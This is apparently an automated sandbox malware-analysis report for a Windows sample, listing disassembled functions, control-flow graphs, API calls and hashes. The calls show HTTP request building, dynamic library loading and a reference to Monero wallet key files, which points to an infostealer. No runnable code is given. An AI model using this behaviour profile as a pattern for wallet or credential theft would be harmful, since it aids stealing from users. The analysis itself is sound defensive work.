                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005346CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005345D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005345F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005345DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005346AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005346C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005345E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534617
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 39a7bafde9548289c54a4633b779626c4beed938dc37124d2040308489a64ccb
                                  • Instruction ID: b0cbda52da9daf5320190efa02cfcc1b14c2edb82877e66e01b8a1d8cff553f8
                                  • Opcode Fuzzy Hash: 39a7bafde9548289c54a4633b779626c4beed938dc37124d2040308489a64ccb
                                  • Instruction Fuzzy Hash: 2E4156247C1E04EFC624F7E5887EE9E7F616F5AF02F417889AD081A282DBF125055531
                                  Function 00534880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 534880-534942 call 54a7a0 call 5347b0 call 54a740 * 5 InternetOpenA StrCmpCA 816 534944 801->816 817 53494b-53494f 801->817 816->817 818 534955-534acd call 548b60 call 54a920 call 54a8a0 call 54a800 * 2 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a920 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a920 call 54a8a0 call 54a800 * 2 InternetConnectA 817->818 819 534ecb-534ef3 InternetCloseHandle call 54aad0 call 539ac0 817->819 818->819 905 534ad3-534ad7 818->905 829 534f32-534fa2 call 548990 * 2 call 54a7a0 call 54a800 * 8 819->829 830 534ef5-534f2d call 54a820 call 54a9b0 call 54a8a0 call 54a800 819->830 830->829 906 534ae5 905->906 907 534ad9-534ae3 905->907 908 534aef-534b22 HttpOpenRequestA 906->908 907->908 909 534b28-534e28 call 54a9b0 call 54a8a0 call 54a800 call 54a920 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a920 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a920 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a9b0 call 54a8a0 call 54a800 call 54a920 call 54a8a0 call 54a800 call 54a740 call 54a920 * 2 call 54a8a0 call 54a800 * 2 call 54aad0 lstrlen call 54aad0 * 2 lstrlen call 54aad0 HttpSendRequestA 908->909 910 534ebe-534ec5 InternetCloseHandle 908->910 1021 534e32-534e5c InternetReadFile 909->1021 910->819 1022 534e67-534eb9 InternetCloseHandle call 54a800 1021->1022 1023 534e5e-534e65 1021->1023 1022->910 1023->1022 1024 534e69-534ea7 call 54a9b0 call 54a8a0 call 54a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00534915
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 0053493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00534ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00550DDB,00000000,?,?,00000000,?,",00000000,?,011FE768), ref: 00534DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00534E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00534E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00534E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00534EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00534EC5
                                  • HttpOpenRequestA.WININET(00000000,011FE7A8,?,011FE158,00000000,00000000,00400100,00000000), ref: 00534B15
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00534ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 02aeab90b0f46dee60a9d4c14e697d50ede29a499e254185ed44bd736c73acf1
                                  • Instruction ID: 58c1ed88f4b535ab6c6d52d635157db1bc5530012b93cf3a4d308cfaab6f2220
                                  • Opcode Fuzzy Hash: 02aeab90b0f46dee60a9d4c14e697d50ede29a499e254185ed44bd736c73acf1
                                  • Instruction Fuzzy Hash: 02123272950119AAEB54EB50DC5AFEEBB38FF94308F504199B10672091EF302F49CF66
                                  Function 00547850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005311B7), ref: 00547880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0054789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 2200d38b0731b7c971100a8de2d53783f3fe61c1387a83333bc655f2927edb56
                                  • Instruction ID: a81502826fccc1742817a1f2adc226143355e8c140feed4830626b73317bef0b
                                  • Opcode Fuzzy Hash: 2200d38b0731b7c971100a8de2d53783f3fe61c1387a83333bc655f2927edb56
                                  • Instruction Fuzzy Hash: 7FF0A4B1904208AFD700CF84DD49BAEBBB8F744711F104159F605A2680C77815448BE2
                                  Function 00531160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 8581f4d88b8e3239bae34b7a33cff23ca2f893d6b73cdc6642965545be295e62
                                  • Instruction ID: 6ecefd9fad1a1b7c3810203e2bec002cc9140d4f984730b5ba0337a25b9d0317
                                  • Opcode Fuzzy Hash: 8581f4d88b8e3239bae34b7a33cff23ca2f893d6b73cdc6642965545be295e62
                                  • Instruction Fuzzy Hash: 24D05E7490030CEBDB04DFE0D8496DDBB78FB48312F000554D90962340EA3054C2CAAA
                                  Function 00549C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 549c10-549c1a 634 54a036-54a0ca LoadLibraryA * 8 633->634 635 549c20-54a031 GetProcAddress * 43 633->635 636 54a146-54a14d 634->636 637 54a0cc-54a141 GetProcAddress * 5 634->637 635->634 638 54a216-54a21d 636->638 639 54a153-54a211 GetProcAddress * 8 636->639 637->636 640 54a21f-54a293 GetProcAddress * 5 638->640 641 54a298-54a29f 638->641 639->638 640->641 642 54a2a5-54a332 GetProcAddress * 6 641->642 643 54a337-54a33e 641->643 642->643 644 54a344-54a41a GetProcAddress * 9 643->644 645 54a41f-54a426 643->645 644->645 646 54a4a2-54a4a9 645->646 647 54a428-54a49d GetProcAddress * 5 645->647 648 54a4dc-54a4e3 646->648 649 54a4ab-54a4d7 GetProcAddress * 2 646->649 647->646 650 54a515-54a51c 648->650 651 54a4e5-54a510 GetProcAddress * 2 648->651 649->648 652 54a612-54a619 650->652 653 54a522-54a60d GetProcAddress * 10 650->653 651->650 654 54a67d-54a684 652->654 655 54a61b-54a678 GetProcAddress * 4 652->655 653->652 656 54a686-54a699 GetProcAddress 654->656 657 54a69e-54a6a5 654->657 655->654 656->657 658 54a6a7-54a703 GetProcAddress * 4 657->658 659 54a708-54a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011E5DB0), ref: 00549C2D
                                  • GetProcAddress.KERNEL32(74DD0000,011E5C90), ref: 00549C45
                                  • GetProcAddress.KERNEL32(74DD0000,011F9658), ref: 00549C5E
                                  • GetProcAddress.KERNEL32(74DD0000,011F9670), ref: 00549C76
                                  • GetProcAddress.KERNEL32(74DD0000,011F96A0), ref: 00549C8E
                                  • GetProcAddress.KERNEL32(74DD0000,011F9628), ref: 00549CA7
                                  • GetProcAddress.KERNEL32(74DD0000,011EB658), ref: 00549CBF
                                  • GetProcAddress.KERNEL32(74DD0000,011FD128), ref: 00549CD7
                                  • GetProcAddress.KERNEL32(74DD0000,011FD308), ref: 00549CF0
                                  • GetProcAddress.KERNEL32(74DD0000,011FD320), ref: 00549D08
                                  • GetProcAddress.KERNEL32(74DD0000,011FD218), ref: 00549D20
                                  • GetProcAddress.KERNEL32(74DD0000,011E5CF0), ref: 00549D39
                                  • GetProcAddress.KERNEL32(74DD0000,011E5D50), ref: 00549D51
                                  • GetProcAddress.KERNEL32(74DD0000,011E5D70), ref: 00549D69
                                  • GetProcAddress.KERNEL32(74DD0000,011E5DD0), ref: 00549D82
                                  • GetProcAddress.KERNEL32(74DD0000,011FD170), ref: 00549D9A
                                  • GetProcAddress.KERNEL32(74DD0000,011FD3E0), ref: 00549DB2
                                  • GetProcAddress.KERNEL32(74DD0000,011EB6D0), ref: 00549DCB
                                  • GetProcAddress.KERNEL32(74DD0000,011E5DF0), ref: 00549DE3
                                  • GetProcAddress.KERNEL32(74DD0000,011FD3B0), ref: 00549DFB
                                  • GetProcAddress.KERNEL32(74DD0000,011FD140), ref: 00549E14
                                  • GetProcAddress.KERNEL32(74DD0000,011FD188), ref: 00549E2C
                                  • GetProcAddress.KERNEL32(74DD0000,011FD110), ref: 00549E44
                                  • GetProcAddress.KERNEL32(74DD0000,011E5E10), ref: 00549E5D
                                  • GetProcAddress.KERNEL32(74DD0000,011FD290), ref: 00549E75
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1A0), ref: 00549E8D
                                  • GetProcAddress.KERNEL32(74DD0000,011FD230), ref: 00549EA6
                                  • GetProcAddress.KERNEL32(74DD0000,011FD158), ref: 00549EBE
                                  • GetProcAddress.KERNEL32(74DD0000,011FD3C8), ref: 00549ED6
                                  • GetProcAddress.KERNEL32(74DD0000,011FD368), ref: 00549EEF
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1B8), ref: 00549F07
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1D0), ref: 00549F1F
                                  • GetProcAddress.KERNEL32(74DD0000,011FD278), ref: 00549F38
                                  • GetProcAddress.KERNEL32(74DD0000,011FA630), ref: 00549F50
                                  • GetProcAddress.KERNEL32(74DD0000,011FD200), ref: 00549F68
                                  • GetProcAddress.KERNEL32(74DD0000,011FD248), ref: 00549F81
                                  • GetProcAddress.KERNEL32(74DD0000,011E5AF0), ref: 00549F99
                                  • GetProcAddress.KERNEL32(74DD0000,011FD0F8), ref: 00549FB1
                                  • GetProcAddress.KERNEL32(74DD0000,011E5830), ref: 00549FCA
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1E8), ref: 00549FE2
                                  • GetProcAddress.KERNEL32(74DD0000,011FD380), ref: 00549FFA
                                  • GetProcAddress.KERNEL32(74DD0000,011E5A50), ref: 0054A013
                                  • GetProcAddress.KERNEL32(74DD0000,011E5770), ref: 0054A02B
                                  • LoadLibraryA.KERNEL32(011FD260,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A03D
                                  • LoadLibraryA.KERNEL32(011FD2A8,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A04E
                                  • LoadLibraryA.KERNEL32(011FD398,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A060
                                  • LoadLibraryA.KERNEL32(011FD2C0,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A072
                                  • LoadLibraryA.KERNEL32(011FD2D8,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A083
                                  • LoadLibraryA.KERNEL32(011FD2F0,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A095
                                  • LoadLibraryA.KERNEL32(011FD338,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A0A7
                                  • LoadLibraryA.KERNEL32(011FD350,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A0B8
                                  • GetProcAddress.KERNEL32(75290000,011E5970), ref: 0054A0DA
                                  • GetProcAddress.KERNEL32(75290000,011FD530), ref: 0054A0F2
                                  • GetProcAddress.KERNEL32(75290000,011F91A8), ref: 0054A10A
                                  • GetProcAddress.KERNEL32(75290000,011FD578), ref: 0054A123
                                  • GetProcAddress.KERNEL32(75290000,011E56D0), ref: 0054A13B
                                  • GetProcAddress.KERNEL32(73560000,011EB9C8), ref: 0054A160
                                  • GetProcAddress.KERNEL32(73560000,011E58D0), ref: 0054A179
                                  • GetProcAddress.KERNEL32(73560000,011EB630), ref: 0054A191
                                  • GetProcAddress.KERNEL32(73560000,011FD548), ref: 0054A1A9
                                  • GetProcAddress.KERNEL32(73560000,011FD4D0), ref: 0054A1C2
                                  • GetProcAddress.KERNEL32(73560000,011E5890), ref: 0054A1DA
                                  • GetProcAddress.KERNEL32(73560000,011E5A30), ref: 0054A1F2
                                  • GetProcAddress.KERNEL32(73560000,011FD458), ref: 0054A20B
                                  • GetProcAddress.KERNEL32(752C0000,011E5810), ref: 0054A22C
                                  • GetProcAddress.KERNEL32(752C0000,011E56B0), ref: 0054A244
                                  • GetProcAddress.KERNEL32(752C0000,011FD560), ref: 0054A25D
                                  • GetProcAddress.KERNEL32(752C0000,011FD590), ref: 0054A275
                                  • GetProcAddress.KERNEL32(752C0000,011E58B0), ref: 0054A28D
                                  • GetProcAddress.KERNEL32(74EC0000,011EB680), ref: 0054A2B3
                                  • GetProcAddress.KERNEL32(74EC0000,011EB8B0), ref: 0054A2CB
                                  • GetProcAddress.KERNEL32(74EC0000,011FD5A8), ref: 0054A2E3
                                  • GetProcAddress.KERNEL32(74EC0000,011E57F0), ref: 0054A2FC
                                  • GetProcAddress.KERNEL32(74EC0000,011E5A10), ref: 0054A314
                                  • GetProcAddress.KERNEL32(74EC0000,011EB6F8), ref: 0054A32C
                                  • GetProcAddress.KERNEL32(75BD0000,011FD4A0), ref: 0054A352
                                  • GetProcAddress.KERNEL32(75BD0000,011E57B0), ref: 0054A36A
                                  • GetProcAddress.KERNEL32(75BD0000,011F9178), ref: 0054A382
                                  • GetProcAddress.KERNEL32(75BD0000,011FD470), ref: 0054A39B
                                  • GetProcAddress.KERNEL32(75BD0000,011FD4E8), ref: 0054A3B3
